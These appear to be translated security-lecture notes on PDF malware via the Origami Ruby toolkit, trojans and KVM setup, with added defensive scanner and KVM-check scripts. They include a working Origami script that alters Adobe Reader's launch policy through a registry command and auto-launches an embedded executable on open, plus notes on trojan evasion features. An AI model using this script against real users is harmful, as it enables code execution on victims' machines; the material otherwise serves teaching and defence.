http://www.security-lab.org/origami/
Developed in Ruby
Makes it easy to add malicious programs to PDF files
%PDF-1.0
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Count 1 /Kids [ 3 0 R ] >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [ 0 0 795 842 ] /Contents 4 0 R
   /Resources << /Font << /F1 << /Type /Font /BaseFont /Helvetica /Subtype /Type1 /Name /F1 >> >> >> >>
endobj
4 0 obj
<< /Length 55 >>
stream
BT /F1 15 Tf 350 750 Td 20 TL 1 Tr (I am Simple) Tj ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000010 00000 n
0000000067 00000 n
0000000136 00000 n
0000000373 00000 n
trailer
<< /Root 1 0 R /Size 5 >>
startxref
485
%%EOF
simple.rb
script.rb
launch.rb
Stream: every kind of data is represented as a stream, including text, other files, video and images
Filter: the encoding applied to a stream's data
  ASCIIHexDecode ASCII85Decode LZWDecode FlateDecode RunLengthDecode CCITTFaxDecode JBIG2Decode DCTDecode JPXDecode
out.rb
Applying a filter
script2.rb
Attaching eicar.com
#!/usr/bin/ruby
$: << "../parser"
require 'parser.rb'
include Origami

# Launch action: runs reg.exe to change Reader 9's attachment-launch permission policy
params = Action::Launch::WindowsLaunchParams.new
params.F = "reg.exe"
#params.D = "C:\\Windows\\system32"
params.P = "add \"HKLM\\SOFTWARE\\Policies\\Adobe\\Acrobat Reader\\9.0\\FeatureLockDown\\cDefaultLaunchAttachmentPerms\" /v tBuiltInPermList /d \"version:1.exe:2.pdf:2\" /f"
action = Action::Launch.new
action.Win = params

# JavaScript action (Acrobat JavaScript API): export the embedded attachment and launch it
jscript = <<EOS
try {
  this.exportDataObject({ cName: "calc.exe", nLaunch: 2 });
} catch(e) {
  app.alert({cMsg: "[line " + e.lineNumber + "] " + e.toString(), cTitle: e.name, nIcon: 0});
}
EOS
jsaction = Action::JavaScript.new(Stream.new(jscript))

pdf = PDF.read("simple.pdf")
attachment = pdf.attach_file("calc.exe", :EmbededName => "calc.exe")
pdf.onDocumentOpen(action)

# Visible paperclip annotation pointing at the embedded file
annot = Annotation::FileAttachment.new({:Name => Annotation::FileAttachment::Icons::PAPERCLIP, :FS => attachment})
annot.Contents = "This contains an embedded file called: 'calc.exe'"
annot.Rect = [ 24, 600, 36, 616 ]
pdf.pages.first.add_annot(annot)
pdf.pages.first.onOpen(jsaction)

pdf.saveas("embed_calc_reader_9.pdf")
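Added example for this page, not code from the slides or from Origami: a small Ruby inspection script that applies the stream filters listed on the Stream/Filter slide and flags the dictionary keys the scripts above depend on (/Launch, /JavaScript, /JS, /EmbeddedFile, /OpenAction, /AA), so a defender can see what a document will do before a reader opens it. It implements the lossless filters that are simple to decode (ASCIIHex, ASCII85, Flate, RunLength); LZW and the image codecs are left encoded. The sample PDF is constructed here from simple.pdf plus a harmless alert-only JavaScript action; the function names and the SUSPICIOUS_KEYS list are my own choices, and the regex object parser is meant for small, well-formed files rather than as a general PDF parser.

```ruby
#!/usr/bin/ruby
# Added example (not Origami's code): decode PDF streams and flag action objects.
require 'zlib'

# Keys that make a document worth a second look (constructed list).
SUSPICIOUS_KEYS = %w[/Launch /JavaScript /JS /EmbeddedFile /OpenAction /AA].freeze
# Filters this example does not decode; their data is passed through unchanged.
PASSTHROUGH     = %w[LZWDecode CCITTFaxDecode JBIG2Decode DCTDecode JPXDecode].freeze

def ascii_hex_decode(data)
  hex = data.sub(/>.*/m, '').delete('^0-9A-Fa-f')
  hex << '0' if hex.length.odd?            # a trailing odd digit is padded with 0
  [hex].pack('H*')
end

def ascii85_decode(data)
  body = data.sub(/\A<~/, '').sub(/~>.*/m, '').delete(" \t\r\n")
  out = ''.b
  body.scan(/z|[!-u]{1,5}/) do |grp|
    if grp == 'z'                           # 'z' is shorthand for four zero bytes
      out << "\0\0\0\0"
    else
      pad = 5 - grp.length                  # short final group: pad with 'u', then trim
      v = (grp + 'u' * pad).each_char.inject(0) { |acc, c| acc * 85 + (c.ord - 33) }
      out << [v].pack('N')[0, 4 - pad]
    end
  end
  out
end

def run_length_decode(data)
  out = ''.b
  i = 0
  while i < data.bytesize
    len = data.getbyte(i)
    break if len == 128                     # EOD marker
    if len < 128                            # literal run of len+1 bytes
      out << data.byteslice(i + 1, len + 1)
      i += len + 2
    else                                    # next byte repeated 257-len times
      out << data.byteslice(i + 1, 1) * (257 - len)
      i += 2
    end
  end
  out
end

# Apply a /Filter chain in order (the first filter listed is applied first).
def decode_stream(filters, raw)
  filters.inject(raw) do |data, f|
    case f
    when 'FlateDecode'     then Zlib::Inflate.inflate(data)
    when 'ASCIIHexDecode'  then ascii_hex_decode(data)
    when 'ASCII85Decode'   then ascii85_decode(data)
    when 'RunLengthDecode' then run_length_decode(data)
    when *PASSTHROUGH      then data
    else raise "unknown filter #{f}"
    end
  end
end

OBJ_RE = /(\d+)\s+\d+\s+obj\s*(<<.*?>>)\s*(?:stream\r?\n(.*?)\r?\nendstream)?\s*endobj/m

# One hash per object: number, dictionary text, filter chain, decoded stream
# data (nil when the object has no stream) and the suspicious keys it matched.
def scan_pdf(pdf)
  pdf.b.scan(OBJ_RE).map do |num, dict, body|
    filters = dict.scan(%r{/Filter\s*(?:/(\w+)|\[([^\]]*)\])}).flatten.compact.join(' ').scan(/\w+/)
    data = body ? decode_stream(filters, body) : nil
    flags = SUSPICIOUS_KEYS.select { |k| dict.include?(k) || (data && data.include?(k)) }
    { num: num.to_i, dict: dict, filters: filters, data: data, flags: flags }
  end
end

# [[object number, flags], ...] for objects carrying an action or embedded file.
def suspicious_objects(pdf)
  scan_pdf(pdf).reject { |o| o[:flags].empty? }.map { |o| [o[:num], o[:flags]] }
end

# Constructed sample: simple.pdf from the slides plus an /OpenAction whose
# (harmless, alert-only) JavaScript is stored as ASCIIHex(Flate(script)).
def sample_pdf
  js  = 'app.alert("hello from the sample");'
  enc = Zlib::Deflate.deflate(js).unpack1('H*') + '>'
  <<~PDF
    %PDF-1.0
    1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
    2 0 obj << /Type /Pages /Count 1 /Kids [ 3 0 R ] >> endobj
    3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [ 0 0 795 842 ] /Contents 4 0 R >> endobj
    4 0 obj << /Length 55 >>
    stream
    BT /F1 15 Tf 350 750 Td 20 TL 1 Tr (I am Simple) Tj ET
    endstream
    endobj
    5 0 obj << /S /JavaScript /JS 6 0 R >> endobj
    6 0 obj << /Length #{enc.bytesize} /Filter [/ASCIIHexDecode /FlateDecode] >>
    stream
    #{enc}
    endstream
    endobj
    trailer << /Root 1 0 R >>
  PDF
end

if $PROGRAM_NAME == __FILE__
  pdf = ARGV[0] ? File.binread(ARGV[0]) : sample_pdf
  scan_pdf(pdf).each do |o|
    puts "obj #{o[:num]}: filters=#{o[:filters].inspect} flags=#{o[:flags].inspect}"
    puts "  decoded stream: #{o[:data][0, 60].inspect}" if o[:data]
  end
end
```

Run it with a file path to inspect that document, or without arguments to scan the built-in sample; the catalog's /OpenAction and the /JavaScript action object are the two hits the sample produces, and the decoded script is shown only after both filters have been reversed, which is the point of decoding before matching.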
cve-2009-0927-geticon.rb
Adobe Reader and Adobe Acrobat Professional < 8.1.4: commands can be executed without user confirmation
http://www.zerodayinitiative.com/advisories
Using Origami, a file can be attached to a PDF and the attached file can be executed
This confirms the security threat posed by PDF files
Update PDF readers to the latest version
Xrat: a rootkit-type trojan
Dabaisha: two control-server entries can be configured; generates a UPX-packed trojan; offers unusual features
Currently detected by antivirus
Adds a digital signature to the program
Bypasses user confirmation
Turn the webcam on, turn the screen off, write text on the screen, control windows
No separate signature exists
The Xrat trojan has a stealth (hiding) capability, but its other features are weak
The Dabaisha trojan offers a variety of features, and some antivirus products fail to detect the UPX-packed file
The first virtualization technique included in the Linux kernel
Code reuse: since it is part of Linux, host and guest are the same
Supports VMX from Intel VT and AMD-V; the CPU must support VMX for KVM to be usable
Kernel modules: kvm.ko plus kvm-intel.ko or kvm-amd.ko
User-space program: QEMU
Advantages
  Performance improves with each Linux kernel update
  Small amount of code, since it relies on VMX
  Each guest OS is a single process (Linux commands can be used on it)
  Simple hosted virtualization
Disadvantages
  A guest OS cannot use more than 2040 of memory
  Still at the stabilization stage
Provides extended instructions called Virtual Machine Extensions (VMX)
MultiTasking  HyperThreading  Virtualization
Guests are scheduled as regular processes
kill(1), top(1) work as expected
Guest physical memory is mapped into the task's virtual memory space
KVM: part of Linux; uses the Linux scheduler and memory management; minimal impact; no support for paravirtualization; under development
Xen: external hypervisor; own scheduler and memory management; intrusive; supports paravirtualization; fairly mature
Linux: openSUSE 11.2
AQEMU: 0.7.3
cat /proc/cpuinfo: check for the vmx flag (Intel) or the svm flag (AMD)
BIOS Advanced Processor options, Intel: Intel(R) Virtualization Technology => Enable
Install KVM: zypper install kvm
Install QEMU: zypper install qemu
Load the kernel modules (/dev/kvm is created): modprobe kvm, modprobe kvm-intel
Install AQEMU: http://sourceforge.net/projects/aqemu/files/
  tar xjvpf aqemu-0.7.3-bin-static-qt-linux-32bit.tar.bz2 -C /
Log in as a regular user and run aqemu
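Added example, not part of the slides: a Ruby pre-flight check for the KVM setup procedure above. It parses /proc/cpuinfo text for the vmx (Intel) or svm (AMD) flag, names the modules that the modprobe step should load, and reports whether /dev/kvm exists. The two cpuinfo samples are constructed and abbreviated; the function names are my own.

```ruby
#!/usr/bin/ruby
# Added example: check the prerequisites for the KVM installation steps above.

# CPU flag -> vendor-specific module named on the slide (kvm.ko is always needed).
VIRT_FLAGS = { 'vmx' => 'kvm-intel', 'svm' => 'kvm-amd' }.freeze

# Returns 'vmx' or 'svm' if /proc/cpuinfo advertises hardware virtualization,
# nil otherwise. `cpuinfo` is the text of /proc/cpuinfo.
def virt_flag(cpuinfo)
  flags_line = cpuinfo.lines.find { |l| l.start_with?('flags') }
  return nil unless flags_line
  flags = flags_line.split(':', 2).last.split
  VIRT_FLAGS.keys.find { |f| flags.include?(f) }
end

# Modules to pass to modprobe, in order; empty when the CPU lacks VT support.
def kvm_modules(cpuinfo)
  flag = virt_flag(cpuinfo)
  flag ? ['kvm', VIRT_FLAGS[flag]] : []
end

# True once the CPU supports VT and the modules have created /dev/kvm.
def kvm_ready?(cpuinfo, dev_path = '/dev/kvm')
  !kvm_modules(cpuinfo).empty? && File.chardev?(dev_path)
end

# Constructed samples (abbreviated flag lists, not real machines).
INTEL_SAMPLE = <<~CPU
  processor\t: 0
  vendor_id\t: GenuineIntel
  flags\t\t: fpu vme de pse tsc msr pae mce sse sse2 ht vmx lahf_lm
CPU
NOVT_SAMPLE = <<~CPU
  processor\t: 0
  vendor_id\t: GenuineIntel
  flags\t\t: fpu vme de pse tsc msr pae mce sse sse2 ht
CPU

if $PROGRAM_NAME == __FILE__
  info = File.exist?('/proc/cpuinfo') ? File.read('/proc/cpuinfo') : INTEL_SAMPLE
  mods = kvm_modules(info)
  if mods.empty?
    puts 'No vmx/svm flag: enable Intel Virtualization Technology / AMD-V in the BIOS'
  else
    puts "Load modules: modprobe #{mods.join(' && modprobe ')}"
    puts "/dev/kvm present: #{File.chardev?('/dev/kvm')}"
  end
end
```

On a host without VT the script stops at the BIOS message, which is the check the slide's cat /proc/cpuinfo step performs by eye; with a vmx or svm CPU it prints the exact modprobe pair to run.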
Usable only on CPUs that support VT; cannot be used on ordinary PCs or laptops
Bridged networking is not easy to set up
Extensive testing is needed before applying it directly in production